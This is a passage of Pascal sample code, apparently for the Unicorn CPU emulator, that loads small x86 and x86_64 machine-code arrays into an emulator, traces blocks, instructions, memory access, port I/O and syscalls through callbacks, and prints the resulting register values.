X86_CODE64: array[0..75] of Byte = ( $41, $BC, $3B, $B0, $28, $2A, $49, $0F, $C9, $90, $4D, $0F, $AD, $CF, $49, $87, $FD, $90, $48, $81, $D2, $8A, $CE, $77, $35, $48, $F7, $D9, $4D, $29, $F4, $49, $81, $C9, $F6, $8A, $C6, $53, $4D, $87, $ED, $48, $0F, $AD, $D2, $49, $F7, $D4, $48, $F7, $E1, $4D, $19, $C5, $4D, $89, $C5, $48, $F7, $D6, $41, $B8, $4F, $8D, $6B, $59, $4D, $87, $D0, $68, $6A, $1E, $09, $3C, $59, $00); X86_CODE16: array[0..2] of Byte = ($00, $00, $00); // add byte ptr [bx + si], al X86_CODE64_SYSCALL: array[0..2] of Byte = ($0f, $05, $00); // SYSCALL // memory address where emulation starts ADDRESS = $1000000; // callback for tracing basic blocks procedure HookBlock(uc: uc_engine; address: UInt64; size: Cardinal; user_data: Pointer); cdecl; begin WriteLn(Format('>>> Tracing basic block at 0x%x, block size = 0x%x', [address, size])); end; // callback for tracing instruction procedure HookCode(uc: uc_engine; address: UInt64; size: Cardinal; user_data: Pointer); cdecl; var eflags: integer; begin WriteLn(Format('>>> Tracing instruction at 0x%x, instruction size = 0x%x', [address, size])); uc_reg_read(uc, UC_X86_REG_EFLAGS, @eflags); WriteLn(Format('>>> --- EFLAGS is 0x%x', [eflags])); end; // callback for tracing instruction procedure HookCode64(uc: uc_engine; address: UInt64; size: Cardinal; user_data: Pointer); cdecl; var rip: UInt64; begin WriteLn(Format('>>> Tracing instruction at 0x%x, instruction size = 0x%x', [address, size])); uc_reg_read(uc, UC_X86_REG_RIP, @rip); WriteLn(Format('>>> --- RIP is 0x%x', [rip])); end; function HookMemInvalid(uc: uc_engine; _type: uc_mem_type; address: UInt64; size: Cardinal; value: Int64; user_data: Pointer): LongBool; cdecl; begin case _type of UC_MEM_WRITE_UNMAPPED: begin WriteLn(Format('>>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x', [address, size, value])); // map this memory in with 2MB in size uc_mem_map(uc, $aaaa0000, 2 * 1024*1024, UC_PROT_ALL); // return true to indicate we want to continue Result := true; end else begin // return false to indicate we want to stop emulation Result := false; end; end; end; procedure HookMem64(uc: uc_engine; _type: uc_mem_type; address: UInt64; size: Cardinal; value: Int64; user_data: Pointer); cdecl; begin case _type of UC_MEM_READ: begin WriteLn(Format('>>> Memory is being READ at 0x%x, data size = %u', [address, size])); end; UC_MEM_WRITE: begin WriteLn(Format('>>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x', [address, size, value])); end; end; end; // callback for IN instruction (X86). // this returns the data read from the port function HookIn(uc: uc_engine; port: UInt32; size: integer; user_data: Pointer): Uint32; cdecl; var eip: UInt32; begin uc_reg_read(uc, UC_X86_REG_EIP, @eip); WriteLn(Format('--- reading from port 0x%x, size: %u, address: 0x%x', [port, size, eip])); case size of 1: begin // read 1 byte to AL Result := $f1; end; 2: begin // read 2 byte to AX Result := $f2; end; 4: begin // read 4 byte to EAX Result := $f4; end; else begin // should never reach this Result := 0; end; end; end; // callback for OUT instruction (X86). 
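// It receives the port number, the access size and the value being written;
// the body re-reads AL/AX/EAX afterwards to confirm the register really
// holds that value.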
procedure HookOut(uc: uc_engine; port: UInt32; size: integer; value: UInt32; user_data: Pointer); cdecl; var tmp, eip: UInt32; begin uc_reg_read(uc, UC_X86_REG_EIP, @eip); WriteLn(Format('--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x', [port, size, value, eip])); // confirm that value is indeed the value of AL/AX/EAX case size of 1: begin uc_reg_read(uc, UC_X86_REG_AL, @tmp); end; 2: begin uc_reg_read(uc, UC_X86_REG_AX, @tmp); end; 4: begin uc_reg_read(uc, UC_X86_REG_EAX, @tmp); end; else begin // should never reach this Exit; end; end; WriteLn(Format('--- register value = 0x%x', [tmp])); end; // callback for SYSCALL instruction (X86). procedure HookSyscall(uc: uc_engine; user_data: Pointer); cdecl; var rax: UInt64; begin uc_reg_read(uc, UC_X86_REG_RAX, @rax); if (rax = $100) then begin rax := $200; uc_reg_write(uc, UC_X86_REG_RAX, @rax); end else WriteLn(Format('ERROR: was not expecting rax=0x%x in syscall', [rax])); end; procedure TestI386; var uc: uc_engine; err: uc_err; tmp: UInt32; trace1, trace2: uc_hook; r_ecx, r_edx: integer; r_xmm0,r_xmm1 : array [0..1] of UInt64; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register r_xmm0[0] := $08090a0b0c0d0e0f; r_xmm0[1] := $0001020304050607; r_xmm1[0] := {%H-}$8090a0b0c0d0e0f0; r_xmm1[1] := $0010203040506070; WriteLn('Emulate i386 code'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32, SizeOf(X86_CODE32) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); uc_reg_write(uc, UC_X86_REG_XMM0, @r_xmm0); uc_reg_write(uc, UC_X86_REG_XMM1, @r_xmm1); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); // emulate machine code in infinite time err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. 
Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); uc_reg_read(uc, UC_X86_REG_XMM0, @r_xmm0); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); WriteLn(Format('>>> XMM0 = 0x%s%s', [IntToHex(r_xmm0[1],16),IntToHex(r_xmm0[0],16)])); // read from memory err := uc_mem_read_(uc, ADDRESS, @tmp, SizeOf(tmp)); if (err = UC_ERR_OK) then begin WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [ADDRESS, tmp])); end else begin WriteLn(Format('>>> Failed to read 4 bytes from [0x%x], err = %u: %s', [ADDRESS, err, uc_strerror(err)])); end; uc_close(uc); end; procedure test_i386_map_ptr(); var uc: uc_engine; err: uc_err; tmp: UInt32; trace1, trace2: uc_hook; mem : Pointer; r_ecx, r_edx: integer; r_xmm0,r_xmm1 : array [0..1] of UInt64; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register r_xmm0[0] := $08090a0b0c0d0e0f; r_xmm0[1] := $0001020304050607; r_xmm1[0] := {%H-}$8090a0b0c0d0e0f0; r_xmm1[1] := $0010203040506070; WriteLn('==================================='); WriteLn('Emulate i386 code - use uc_mem_map_ptr()'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; mem := AllocMem(2 * 1024 * 1024); if mem = nil then begin Writeln('Failed to Allocmem'); uc_close(uc); exit; end; err := uc_mem_map_ptr(uc,ADDRESS,2 * 1024 * 1024,UC_PROT_ALL,mem); if err <> UC_ERR_OK then begin WriteLn(Format('Failed on uc_mem_map_ptr() with error returned: %u - %s', [err,uc_strerror(err)])); FreeMem(mem,2 * 1024 * 1024); uc_close(uc); Exit; end; Move(X86_CODE32,mem^,SizeOf(X86_CODE32)-1); if CompareMem(mem,@X86_CODE32,SizeOf(X86_CODE32)-1) <> true then begin Writeln('Failed to write emulation code to memory, quit!'); Freemem(mem,2 * 1024 * 1024); uc_close(uc); exit; end; uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); uc_reg_write(uc, UC_X86_REG_XMM0, @r_xmm0); uc_reg_write(uc, UC_X86_REG_XMM1, @r_xmm1); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end . uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); // emulate machine code in infinite time err := uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); if err <> UC_ERR_OK then WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); Writeln('>>> Emulation done. 
Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); uc_reg_read(uc, UC_X86_REG_XMM0, @r_xmm0); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); WriteLn(Format('>>> XMM0 = 0x%s%s', [IntToHex(r_xmm0[1],16),IntToHex(r_xmm0[0],16)])); // read from memory err := uc_mem_read_(uc, ADDRESS, @tmp, SizeOf(tmp)); if (err = UC_ERR_OK) then begin WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [ADDRESS, tmp])); end else begin WriteLn(Format('>>> Failed to read 4 bytes from [0x%x], err = %u: %s', [ADDRESS, err, uc_strerror(err)])); end; Freemem(mem,2 * 1024 * 1024); uc_close(uc); end; procedure TestI386Jump; var uc: uc_engine; err: uc_err; trace1, trace2: uc_hook; begin WriteLn('==================================='); WriteLn('Emulate i386 code with jump'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_JUMP, SizeOf(X86_CODE32_JUMP) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // tracing 1 basic block with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, ADDRESS, ADDRESS,[]); // tracing 1 instruction at ADDRESS uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, ADDRESS, ADDRESS,[]); // emulate machine code in infinite time err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_JUMP) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; WriteLn('>>> Emulation done.'); uc_close(uc); end; procedure TestI386Loop; var uc: uc_engine; err: uc_err; r_ecx, r_edx: integer; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register WriteLn('==================================='); WriteLn('Emulate i386 code that loop forever'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_LOOP, SizeOf(X86_CODE32_LOOP) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); // emulate machine code in 2 seconds, so we can quit even // if the code loops err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_LOOP) - 1, 2 * UC_SECOND_SCALE, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. 
Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); uc_close(uc); end; procedure TestI386InvalidMemRead; var uc: uc_engine; err: uc_err; trace1, trace2: uc_hook; r_ecx, r_edx: integer; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register WriteLn('==================================='); WriteLn('Emulate i386 code that read from invalid memory'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_MEM_READ, SizeOf(X86_CODE32_MEM_READ) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); uc_close(uc); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_MEM_READ) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); uc_close(uc); end; procedure TestI386InvalidMemWrite; var uc: uc_engine; err: uc_err; trace1, trace2, trace3: uc_hook; r_ecx, r_edx: integer; tmp: UInt32; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register WriteLn('==================================='); WriteLn('Emulate i386 code that write to invalid memory'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_MEM_WRITE, SizeOf(X86_CODE32_MEM_WRITE) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); // intercept invalid memory events uc_hook_add(uc, trace3, UC_HOOK_MEM_READ_UNMAPPED or UC_HOOK_MEM_WRITE_UNMAPPED, @HookMemInvalid, nil,1,0,[]); err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_MEM_WRITE) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. 
Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); // read from memory err := uc_mem_read_(uc, $aaaaaaaa, @tmp, SizeOf(tmp)); if (err = UC_ERR_OK) then WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [$aaaaaaaa, tmp])) else WriteLn(Format('>>> Failed to read 4 bytes from [0x%x]', [$aaaaaaaa])); err := uc_mem_read_(uc, $ffffffaa, @tmp, SizeOf(tmp)); if (err = UC_ERR_OK) then WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [$ffffffaa, tmp])) else WriteLn(Format('>>> Failed to read 4 bytes from [0x%x]', [$ffffffaa])); uc_close(uc); end; procedure TestI386JumpInvalid; var uc: uc_engine; err: uc_err; trace1, trace2: uc_hook; r_ecx, r_edx: integer; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register WriteLn('==================================='); WriteLn('Emulate i386 code that jumps to invalid memory'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_JMP_INVALID, SizeOf(X86_CODE32_JMP_INVALID) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); uc_close(uc); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_JMP_INVALID) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. 
Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); uc_close(uc); end; procedure TestI386Inout; var uc: uc_engine; err: uc_err; trace1, trace2, trace3, trace4: uc_hook; r_ecx, r_edx: integer; begin r_ecx := $1234; // ECX register r_edx := $7890; // EDX register WriteLn('==================================='); WriteLn('Emulate i386 code with IN/OUT instructions'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_INOUT, SizeOf(X86_CODE32_INOUT) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instruction by having @begin > @end uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); // uc IN instruction uc_hook_add(uc, trace3, UC_HOOK_INSN, @HookIn, nil, 1,0,[UC_X86_INS_IN]); // uc OUT instruction uc_hook_add(uc, trace4, UC_HOOK_INSN, @HookOut, nil, 1,0,[UC_X86_INS_OUT]); err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_INOUT) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); WriteLn(Format('>>> EDX = 0x%x', [r_edx])); uc_close(uc); end; procedure test_i386_context_save(); var uc: uc_engine; context : uc_context; err: uc_err; r_eax : integer; begin r_eax := 1; // EAX register WriteLn('==================================='); WriteLn('Emulate i386 code - Save/restore CPU context in opaque blob'); // Initialize emulator in X86-32bit mode err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; uc_mem_map(uc,ADDRESS,8 * 1024 , UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_INC, SizeOf(X86_CODE32_INC) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); uc_close(uc); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, @r_eax); // emulate machine code in infinite time writeln('>>> Running emulation for the first time'); err := uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; Writeln('>>> Emulation done. 
Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_EAX, @r_eax); WriteLn(Format('>>> EAX = 0x%x', [r_eax])); Writeln('>>> Saving CPU context'); err := uc_context_alloc(uc,context); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_context_alloc() with error returned %u : %s', [err, uc_strerror(err)])); exit; end; err := uc_context_save(uc, context); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_context_save() with error returned %u : %s', [err, uc_strerror(err)])); exit; end; Writeln('>>> Running emulation for the second time'); err := uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; Writeln('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_EAX, @r_eax); WriteLn(Format('>>> EAX = 0x%x', [r_eax])); err := uc_context_restore(uc, context); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_context_restore() with error returned %u: %s', [err, uc_strerror(err)])); exit; end; Writeln('>>> CPU context restored. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_EAX, @r_eax); WriteLn(Format('>>> EAX = 0x%x', [r_eax])); err := uc_free(context); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_free() with error returned %u: %s', [err, uc_strerror(err)])); exit; end; uc_close(uc); end; procedure TestX86_64; var uc: uc_engine; err: uc_err; trace1, trace2, trace3, trace4: uc_hook; rax, rbx, rcx, rdx, rsi, rdi, r8, r9, r10, r11, r12, r13, r14, r15, rsp: UInt64; begin rax := $71f3029efd49d41d; rbx := $d87b45277f133ddb; rcx := $ab40d1ffd8afc461; rdx := $919317b4a733f01; rsi := $4c24e753a17ea358; rdi := $e509a57d2571ce96; r8 := $ea5b108cc2b9ab1f; r9 := $19ec097c8eb618c1; r10 := $ec45774f00c5f682; r11 := $e17e9dbec8c074aa; r12 := $80f86a8dc0f6d457; r13 := $48288ca5671c5492; r14 := $595f72f6e4017f6e; r15 := $1efd97aea331cccc; rsp := ADDRESS + $200000; WriteLn('Emulate x86_64 code'); // Initialize emulator in X86-64bit mode err := uc_open(UC_ARCH_X86, UC_MODE_64, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE64, SizeOf(X86_CODE64) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_RSP, @rsp); uc_reg_write(uc, UC_X86_REG_RAX, @rax); uc_reg_write(uc, UC_X86_REG_RBX, @rbx); uc_reg_write(uc, UC_X86_REG_RCX, @rcx); uc_reg_write(uc, UC_X86_REG_RDX, @rdx); uc_reg_write(uc, UC_X86_REG_RSI, @rsi); uc_reg_write(uc, UC_X86_REG_RDI, @rdi); uc_reg_write(uc, UC_X86_REG_R8, @r8); uc_reg_write(uc, UC_X86_REG_R9, @r9); uc_reg_write(uc, UC_X86_REG_R10, @r10); uc_reg_write(uc, UC_X86_REG_R11, @r11); uc_reg_write(uc, UC_X86_REG_R12, @r12); uc_reg_write(uc, UC_X86_REG_R13, @r13); uc_reg_write(uc, UC_X86_REG_R14, @r14); uc_reg_write(uc, UC_X86_REG_R15, @r15); // tracing all basic blocks with customized callback uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); // tracing all instructions in the range [ADDRESS, ADDRESS + 20] uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode64, nil, ADDRESS, ADDRESS + 20,[]); // tracing all memory WRITE access (with @begin > @end) uc_hook_add(uc, trace3, UC_HOOK_MEM_WRITE, @HookMem64, nil, 1, 0,[]); // 
tracing all memory READ access (with @begin > @end) uc_hook_add(uc, trace4, UC_HOOK_MEM_READ, @HookMem64, nil, 1, 0,[]); err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE64) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_RAX, @rax); uc_reg_read(uc, UC_X86_REG_RBX, @rbx); uc_reg_read(uc, UC_X86_REG_RCX, @rcx); uc_reg_read(uc, UC_X86_REG_RDX, @rdx); uc_reg_read(uc, UC_X86_REG_RSI, @rsi); uc_reg_read(uc, UC_X86_REG_RDI, @rdi); uc_reg_read(uc, UC_X86_REG_R8, @r8); uc_reg_read(uc, UC_X86_REG_R9, @r9); uc_reg_read(uc, UC_X86_REG_R10, @r10); uc_reg_read(uc, UC_X86_REG_R11, @r11); uc_reg_read(uc, UC_X86_REG_R12, @r12); uc_reg_read(uc, UC_X86_REG_R13, @r13); uc_reg_read(uc, UC_X86_REG_R14, @r14); uc_reg_read(uc, UC_X86_REG_R15, @r15); WriteLn(Format('>>> RAX = 0x%.16x', [rax])); WriteLn(Format('>>> RBX = 0x%.16x', [rbx])); WriteLn(Format('>>> RCX = 0x%.16x', [rcx])); WriteLn(Format('>>> RDX = 0x%.16x', [rdx])); WriteLn(Format('>>> RSI = 0x%.16x', [rsi])); WriteLn(Format('>>> RDI = 0x%.16x', [rdi])); WriteLn(Format('>>> R8 = 0x%.16x', [r8])); WriteLn(Format('>>> R9 = 0x%.16x', [r9])); WriteLn(Format('>>> R10 = 0x%.16x', [r10])); WriteLn(Format('>>> R11 = 0x%.16x', [r11])); WriteLn(Format('>>> R12 = 0x%.16x', [r12])); WriteLn(Format('>>> R13 = 0x%.16x', [r13])); WriteLn(Format('>>> R14 = 0x%.16x', [r14])); WriteLn(Format('>>> R15 = 0x%.16x', [r15])); uc_close(uc); end; procedure TestX86_64Syscall; var uc: uc_engine; err: uc_err; trace1: uc_hook; rax: UInt64; begin rax := $100; WriteLn('==================================='); WriteLn('Emulate x86_64 code with "syscall" instruction'); // Initialize emulator in X86-64bit mode err := uc_open(UC_ARCH_X86, UC_MODE_64, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, ADDRESS, @X86_CODE64_SYSCALL, SizeOf(X86_CODE64_SYSCALL) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // hook interrupts for syscall uc_hook_add(uc, trace1, UC_HOOK_INSN, @HookSyscall, nil, 1 , 0 , [UC_X86_INS_SYSCALL]); // initialize machine registers uc_reg_write(uc, UC_X86_REG_RAX, @rax); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE64_SYSCALL) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. 
